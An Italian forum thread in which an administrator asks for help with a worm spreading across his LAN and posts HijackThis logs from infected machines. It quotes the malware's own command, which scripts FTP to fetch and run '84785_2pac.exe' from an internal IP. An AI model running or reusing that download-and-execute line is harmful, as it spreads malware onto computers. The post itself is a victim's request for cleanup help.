Condividi:        

Virus malefico che si propaga in una lan.

Come rimuovere virus e spyware? Le carte di credito sono davvero sicure in rete? È possibile navigare anonimi? Con quali programmi tutelare la propria privacy? Come proteggere i file importanti? Se volete una risposta a queste e altre domande questo è il luogo giusto!

Moderatori: m.paolo, kadosh, Luke57

Virus malefico che si propaga in una lan.

Postdi padrino » 08/05/07 09:54

Ciao a tutti.
Ho 6 pc che continuano a far partire finestre di dos in contemporanea.
Poi appaioni due file e un servizio strano.
Non riesco a capire chi è che innesca questo processo malefico che mi imballa 4 client e due server :-(


Il comando che parte in automatico è questo:

cmd /c echo OPEN 172.20.11.36 6561>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit

I file che si creano sono:

84785_2pac.exe spesso viene creato in una directory del server.
C:\WINDOWS\system32\dllcache\Updtftpini.exe questo invece si viene a creare in locale.

E in più si crea un servizio che si chiama così:

Microsoft windows FTPd

Ecco il log di HijackThis, se riesco vi posto anche quello di un client magari.

Logfile of HijackThis v1.99.1
Scan saved at 10.33.45, on 08/05/2007
Platform: Windows 2003 SP1 (WinNT 5.02.3790)
MSIE: Internet Explorer v7.00 (7.00.6000.16414)

Running processes:
C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programmi\IBM\ServeRAID Manager\aqagent.exe
C:\Programmi\IBM\Director\bin\asf\ASFAgent.exe
C:\Programmi\IBM\Director\bin\ibmasfsrv.exe
C:\Programmi\IBM\Director\cimom\bin\BAsfIpM.exe
C:\Programmi\IBM\Director\cimom\bin\cimlistener.exe
C:\WINDOWS\system32\cisvc.exe
C:\WINDOWS\CWBRXD.EXE
C:\WINDOWS\System32\svchost.exe
C:\Programmi\IBM\Director\bin\IBMSA.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\Programmi\IBM\Director\bin\slp_srvreg.exe
C:\Programmi\Network Associates\Common Framework\FrameworkService.exe
C:\Programmi\Network Associates\VirusScan\Mcshield.exe
C:\Programmi\Network Associates\VirusScan\VsTskMgr.exe
C:\Programmi\IBM\ServeRAID Manager\miniwinagent.exe
f:\Archidoc\Engine\BIN\RDS.EXE
C:\Programmi\IBM\ServeRAID Manager\RaidServ.exe
C:\Programmi\Siav\e-Dispatcher\edispatcher.exe
C:\Programmi\IBM\Director\cimom\bin\tier1slp.exe
C:\Programmi\IBM\Director\bin\twgipcsv.exe
C:\Programmi\IBM\Director\bin\twgipc.exe
C:\VEXPLITE\viritsvc.exe
C:\Programmi\RealVNC\VNC4\WinVNC4.exe
C:\Programmi\IBM\Director\cimom\bin\wmicimserver.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmi\IBM\Director\bin\twgengsv.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmi\IBM\Director\bin\twgsrvw.exe
C:\WINDOWS\Explorer.EXE
C:\Programmi\IBM\Director\bin\TWGLogEngine.exe
C:\Programmi\Network Associates\VirusScan\SHSTAT.EXE
C:\Programmi\Network Associates\Common Framework\UpdaterUI.exe
C:\Programmi\File comuni\Network Associates\TalkBack\TBMon.exe
C:\VEXPLITE\MONLITE.EXE
C:\Programmi\IBM\Director\bin\twgescli.exe
C:\Programmi\IBM\Director\bin\twgmonit.exe
C:\Programmi\File comuni\Ahead\lib\NMBgMonitor.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programmi\IBM\Director\bin\twgsrvst.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmi\IBM\Director\bin\twgsrvxw.exe
C:\Programmi\Prevx1\PXConsole.exe
C:\Programmi\Prevx1\PXAgent.exe
C:\WINDOWS\system32\cidaemon.exe
C:\WINDOWS\system32\cidaemon.exe
C:\Programmi\Internet Explorer\iexplore.exe
C:\hijackthis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = res://shdoclc.dll/hardAdmin.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = res://shdoclc.dll/hardAdmin.htm
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = C:\WINDOWS\system32\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Collegamenti
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmi\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Malicious Scripts Scanner - {55EA1964-F5E4-4D6A-B9B2-125B37655FCB} - C:\Documents and Settings\All Users\Dati applicazioni\Prevx\pxbho.dll
O4 - HKLM\..\Run: [Tweak UI] RUNDLL32.EXE TWEAKUI.CPL,TweakMeUp
O4 - HKLM\..\Run: [ShStatEXE] "C:\Programmi\Network Associates\VirusScan\SHSTAT.EXE" /STANDALONE
O4 - HKLM\..\Run: [McAfeeUpdaterUI] "C:\Programmi\Network Associates\Common Framework\UpdaterUI.exe" /StartedFromRunKey
O4 - HKLM\..\Run: [Network Associates Error Reporting Service] "C:\Programmi\File comuni\Network Associates\TalkBack\TBMon.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Programmi\File comuni\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [Client Access Service] "C:\Programmi\IBM\Client Access\cwbsvstr.exe"
O4 - HKLM\..\Run: [Client Access Help Update] "C:\Programmi\IBM\Client Access\cwbinhlp.exe"
O4 - HKLM\..\Run: [Client Access Check Version] "C:\Programmi\IBM\Client Access\cwbckver.exe" LOGIN
O4 - HKLM\..\Run: [Client Access Express Welcome] "C:\Programmi\IBM\Client Access\cwbwlwiz.exe"
O4 - HKLM\..\Run: [VIRIT LITE MONITOR] C:\VEXPLITE\MONLITE.EXE
O4 - HKLM\..\Run: [PrevxOne] "C:\Programmi\Prevx1\PXConsole.exe"
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Programmi\File comuni\Ahead\lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [updateMgr] C:\Programmi\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe AcRdB7_0_5 -reboot 1
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\RunOnce: [FlashPlayerUpdate] C:\WINDOWS\system32\Macromed\Flash\GetFlash.exe
O4 - Global Startup: Avvio veloce di Adobe Reader.lnk = C:\Programmi\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Server status.lnk = C:\Programmi\IBM\Director\bin\twgsrvst.exe
O10 - Broken Internet access because of LSP provider 'c:\documents and settings\administrator.gio2000\windows\system32\mswsock.dll' missing
O11 - Options group: [INTERNATIONAL] International*
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\Software\..\Telephony: DomainName = gio2000.loc
O17 - HKLM\System\CCS\Services\Tcpip\..\{DE0EA623-0478-4907-BD81-C2F196971765}: NameServer = 172.20.10.19,172.20.10.3
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = gio2000.loc
O20 - Winlogon Notify: dimsntfy - dimsntfy.dll (file missing)
O20 - Winlogon Notify: WgaLogon - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\
O23 - Service: Servizio di verifica compatibilità applicazioni (AeLookupSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Avvisi (Alerter) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Servizio Gateway di livello applicazione (ALG) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Gestione applicazione (AppMgmt) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Application Quiesce Agent (aqagent) - Adaptec - C:\Programmi\IBM\ServeRAID Manager\aqagent.exe
O23 - Service: ASF Agent (ASFAgent) - Intel Corporation - C:\Programmi\IBM\Director\bin\asf\ASFAgent.exe
O23 - Service: AsfSrv - IBM Corporation - C:\Programmi\IBM\Director\bin\ibmasfsrv.exe
O23 - Service: Servizio stato di ASP.NET (aspnet_state) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe (file missing)
O23 - Service: Audio Windows (AudioSrv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Broadcom ASF IP monitoring service v3.0.1 (BAsfIpM) - Broadcom Corp. - C:\Programmi\IBM\Director\cimom\bin\BAsfIpM.exe
O23 - Service: Servizio trasferimento intelligente in background (BITS) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Browser di computer (Browser) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: IBM Director CIM Listener (cimlistener) - OpenSource Pegasus - C:\Programmi\IBM\Director\cimom\bin\cimlistener.exe
O23 - Service: Servizio di indicizzazione (CiSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\cisvc.exe (file missing)
O23 - Service: Servizi di crittografia (CryptSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Comando remoto iSeries Access per Windows (Cwbrxd) - IBM Corporation - C:\WINDOWS\CWBRXD.EXE
O23 - Service: Utilità di avvio processi server DCOM (DcomLaunch) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: File system distribuito (Dfs) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\Dfssvc.exe (file missing)
O23 - Service: Client DHCP (Dhcp) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Servizio amministrativo di Gestione disco logico (dmadmin) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\dmadmin.exe (file missing)
O23 - Service: Gestione dischi logici (dmserver) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Client DNS (Dnscache) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Servizio di segnalazione errori (ERSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Registro eventi (Eventlog) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\services.exe (file missing)
O23 - Service: Guida in linea e supporto tecnico (helpsvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: HID Input Service (HidServ) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: IBM SLP SA (ibmsa) - IBM Corporation - C:\Programmi\IBM\Director\bin\IBMSA.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmi\File comuni\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: Server (lanmanserver) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Workstation (lanmanworkstation) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Helper NetBIOS di TCP/IP (LmHosts) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Servizio di framework di McAfee (McAfeeFramework) - Network Associates, Inc. - C:\Programmi\Network Associates\Common Framework\FrameworkService.exe
O23 - Service: Network Associates McShield (McShield) - Network Associates, Inc. - C:\Programmi\Network Associates\VirusScan\Mcshield.exe
O23 - Service: Network Associates Task Manager (McTaskManager) - Network Associates, Inc. - C:\Programmi\Network Associates\VirusScan\VsTskMgr.exe
O23 - Service: ServeRAID FlashCopy Agent (miniwinagent) - Unknown owner - C:\Programmi\IBM\ServeRAID Manager\miniwinagent.exe
O23 - Service: Servizio Pubblicazione FTP (MSFtpsvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\inetsrv\inetinfo.exe (file missing)
O23 - Service: Accesso rete (Netlogon) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Connessioni di rete (Netman) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: NLA (Network Location Awareness) (Nla) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Replica file (NtFrs) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\ntfrs.exe (file missing)
O23 - Service: Provider supporto protezione LM NT (NtLmSsp) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Archivi rimovibili (NtmsSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Plug and Play (PlugPlay) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\services.exe (file missing)
O23 - Service: Servizi IPSEC (PolicyAgent) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Prevx Agent (PREVXAgent) - Unknown owner - C:\Programmi\Prevx1\PXAgent.exe" -f (file missing)
O23 - Service: Archiviazione protetta (ProtectedStorage) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Auto Connection Manager di Accesso remoto (RasAuto) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Connection Manager di Accesso remoto (RasMan) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: RDM Server (RDS) - Unknown owner - f:\Archidoc\Engine\BIN\RDS.EXE" RDS (file missing)
O23 - Service: Registro di sistema remoto (RemoteRegistry) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: RPC Locator (RpcLocator) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\locator.exe (file missing)
O23 - Service: RPC (Remote Procedure Call) (RpcSs) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Provider Gruppo di criteri risultante (RSoPProv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\RSoPProv.exe (file missing)
O23 - Service: Helper console di amministrazione speciale (sacsvr) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Gestione account di protezione (SAM) (SamSs) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Smart card (SCardSvr) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\SCardSvr.exe (file missing)
O23 - Service: Utilità di pianificazione (Schedule) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Accesso secondario (seclogon) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Notifica eventi di sistema (SENS) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: ServeRAID Manager Agent (ServeRAIDManagerAgent) - Adaptec Incorporated - C:\Programmi\IBM\ServeRAID Manager\RaidServ.exe
O23 - Service: Windows Firewall / Condivisione connessione Internet (ICS) (SharedAccess) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Rilevamento hardware shell (ShellHWDetection) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Siav e-Dispatcher - Siav - Soluzioni Informatiche e di Automazione - C:\Programmi\Siav\e-Dispatcher\edispatcher.exe
O23 - Service: Siav Mailbox - Siav - Soluzioni Informatiche e di Automazione - C:\Programmi\Siav\e-Dispatcher\SvMailbox.exe
O23 - Service: Spooler di stampa (Spooler) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\spoolsv.exe (file missing)
O23 - Service: Microsoft Software Shadow Copy Provider (swprv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Avvisi e registri di prestazioni (SysmonLog) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\smlogsvc.exe (file missing)
O23 - Service: Telefonia (TapiSrv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Servizi terminal (TermService) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: IBM Director Agent SLP Attributes (tier1slp) - IBM Corporation - C:\Programmi\IBM\Director\cimom\bin\tier1slp.exe
O23 - Service: Manutenzione collegamenti distribuiti client (TrkWks) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: IBM Director Support Program (TWGIPC) - IBM Corporation - C:\Programmi\IBM\Director\bin\twgipcsv.exe
O23 - Service: IBM Director Server (TWGSERVER) - IBM Corporation - C:\Programmi\IBM\Director\bin\twgengsv.exe
O23 - Service: Gruppo di continuità (UPS) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\ups.exe (file missing)
O23 - Service: Servizio dischi virtuali (vds) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\vds.exe (file missing)
O23 - Service: Virit eXplorer Lite (viritsvclite) - TG Soft Sas http://www.tgsoft.it - C:\VEXPLITE\viritsvc.exe
O23 - Service: Copia shadow del volume (VSS) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\vssvc.exe (file missing)
O23 - Service: Ora di Windows (W32Time) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Servizio Pubblicazione sul Web (W3SVC) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Servizio rilevamento automatico proxy WinHTTP (WinHttpAutoProxySvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Strumentazione gestione Windows (winmgmt) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Programmi\RealVNC\VNC4\WinVNC4.exe" -service (file missing)
O23 - Service: Portable Media Serial Number Service (WmdmPmSN) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Estensioni driver di Strumentazione gestione Windows (Wmi) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: IBM Director Agent WMI CIM Server (wmicimserver) - IBM Corporation - C:\Programmi\IBM\Director\cimom\bin\wmicimserver.exe
O23 - Service: Aggiornamenti automatici (wuauserv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Configurazione senza fili (WZCSVC) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Servizio Provisioning di rete (xmlprov) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
padrino
Newbie
 
Post: 7
Iscritto il: 29/08/06 01:12
Località: Messina

Sponsor
 

Postdi padrino » 09/05/07 11:45

Ecco i log di due client infetti.
Questi presentano una particolarità in più:

Tutte le volte che provo ad andare su pannello di controllo/installazioni applicazioni parte un pop up con scritto file sentinel e ikl percorso del server sul quale tenta di scrivere.

Client 1:

Logfile of HijackThis v1.99.1
Scan saved at 12.19.29, on 09/05/2007
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\hidserv.exe
C:\Programmi\McAfee\Common Framework\FrameworkService.exe
C:\Programmi\McAfee\VirusScan Enterprise\Mcshield.exe
C:\Programmi\McAfee\VirusScan Enterprise\VsTskMgr.exe
C:\Programmi\Prevx1\PXAgent.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\Programmi\RealVNC\VNC4\WinVNC4.exe
C:\WINNT\system32\mspmspsv.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\Explorer.EXE
C:\Programmi\Java\jre1.6.0_01\bin\jusched.exe
C:\Programmi\Picasa2\PicasaMediaDetector.exe
C:\Programmi\QuickTime\qttask.exe
C:\Programmi\McAfee\Common Framework\UdaterUI.exe
C:\Programmi\Prevx1\PXConsole.exe
C:\WINNT\system32\internat.exe
C:\Programmi\McAfee\Common Framework\McTray.exe
C:\Programmi\Microsoft Office\Office\MSOFFICE.EXE
C:\Programmi\Microsoft Office\Office\EXCEL.EXE
C:\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Collegamenti
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmi\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Malicious Scripts Scanner - {55EA1964-F5E4-4D6A-B9B2-125B37655FCB} - C:\Documents and Settings\All Users\Dati applicazioni\Prevx\pxbho.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programmi\Java\jre1.6.0_01\bin\ssv.dll
O2 - BHO: scriptproxy - {7DB2D5A0-7241-4E79-B68D-6309F01C5231} - C:\Programmi\McAfee\VirusScan Enterprise\scriptcl.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\system32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [Client Access Service] "C:\Programmi\IBM\Client Access\cwbsvstr.exe"
O4 - HKLM\..\Run: [Client Access Help Update] "C:\Programmi\IBM\Client Access\cwbinhlp.exe"
O4 - HKLM\..\Run: [Client Access Check Version] "C:\Programmi\IBM\Client Access\cwbckver.exe" LOGIN
O4 - HKLM\..\Run: [Client Access Express Welcome] "C:\Programmi\IBM\Client Access\cwbwlwiz.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programmi\Java\jre1.6.0_01\bin\jusched.exe"
O4 - HKLM\..\Run: [Picasa Media Detector] C:\Programmi\Picasa2\PicasaMediaDetector.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Programmi\File comuni\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programmi\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [ShStatEXE] "C:\Programmi\McAfee\VirusScan Enterprise\SHSTAT.EXE" /STANDALONE
O4 - HKLM\..\Run: [McAfeeUpdaterUI] "C:\Programmi\McAfee\Common Framework\UdaterUI.exe" /StartedFromRunKey
O4 - HKLM\..\Run: [PrevxOne] "C:\Programmi\Prevx1\PXConsole.exe"
O4 - HKCU\..\Run: [internat.exe] internat.exe
O4 - Global Startup: as400.lnk = C:\as400.bat
O4 - Global Startup: Avvio veloce di Adobe Reader.lnk = C:\Programmi\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Barra degli strumenti Microsoft Office.lnk = C:\Programmi\Microsoft Office\Office\MSOFFICE.EXE
O4 - Global Startup: CopiaMdw2000.lnk = ProtAcc\CopiaMdw2000.bat
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\System\CCS\Services\Tcpip\..\{A29A4F37-B20F-413E-8D50-DBF4991421AE}: Domain = ********
O17 - HKLM\System\CCS\Services\Tcpip\..\{A29A4F37-B20F-413E-8D50-DBF4991421AE}: NameServer = 172.20.10.19,172.20.10.3
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = ********
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = ********
O23 - Service: Comando remoto iSeries Access per Windows (Cwbrxd) - IBM Corporation - C:\WINNT\CWBRXD.EXE
O23 - Service: Servizio amministrativo di Gestione disco logico (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Programmi\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: McAfee Framework Service (McAfeeFramework) - Unknown owner - C:\Programmi\McAfee\Common Framework\FrameworkService.exe" /ServiceStart (file missing)
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Programmi\McAfee\VirusScan Enterprise\Mcshield.exe
O23 - Service: McAfee Task Manager (McTaskManager) - McAfee, Inc. - C:\Programmi\McAfee\VirusScan Enterprise\VsTskMgr.exe
O23 - Service: Prevx Agent (PREVXAgent) - Unknown owner - C:\Programmi\Prevx1\PXAgent.exe" -f (file missing)
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Programmi\RealVNC\VNC4\WinVNC4.exe" -service (file missing)


Client 2:

Logfile of HijackThis v1.99.1
Scan saved at 12.13.25, on 09/05/2007
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\Programmi\IVT Corporation\BlueSoleil\BTNtService.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\hidserv.exe
C:\Programmi\Network Associates\Common Framework\FrameworkService.exe
C:\Programmi\Network Associates\VirusScan\VsTskMgr.exe
C:\Programmi\Prevx1\PXAgent.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\Programmi\Analog Devices\SoundMAX\spkrmon.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\Programmi\RealVNC\VNC4\WinVNC4.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\Explorer.EXE
C:\Documents and Settings\All Users\Dati applicazioni\Skype\Plugins\Plugins\1163D2B46CC742E5A3CC9E4157887751\TalkAndWrite.exe
C:\Programmi\Nokia\Nokia PC Suite 6\LaunchApplication.exe
C:\Programmi\Prevx1\PXConsole.exe
C:\Programmi\MSN Messenger\MsnMsgr.Exe
C:\Programmi\Google\Google Talk\googletalk.exe
C:\Programmi\IVT Corporation\BlueSoleil\BlueSoleil.exe
C:\Lotus\Notes\NLNOTES.EXE
C:\Lotus\Notes\naldaemn.EXE
C:\WINNT\system32\wuauclt.exe
C:\Programmi\Mozilla Firefox\firefox.exe
C:\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = \blank.htm
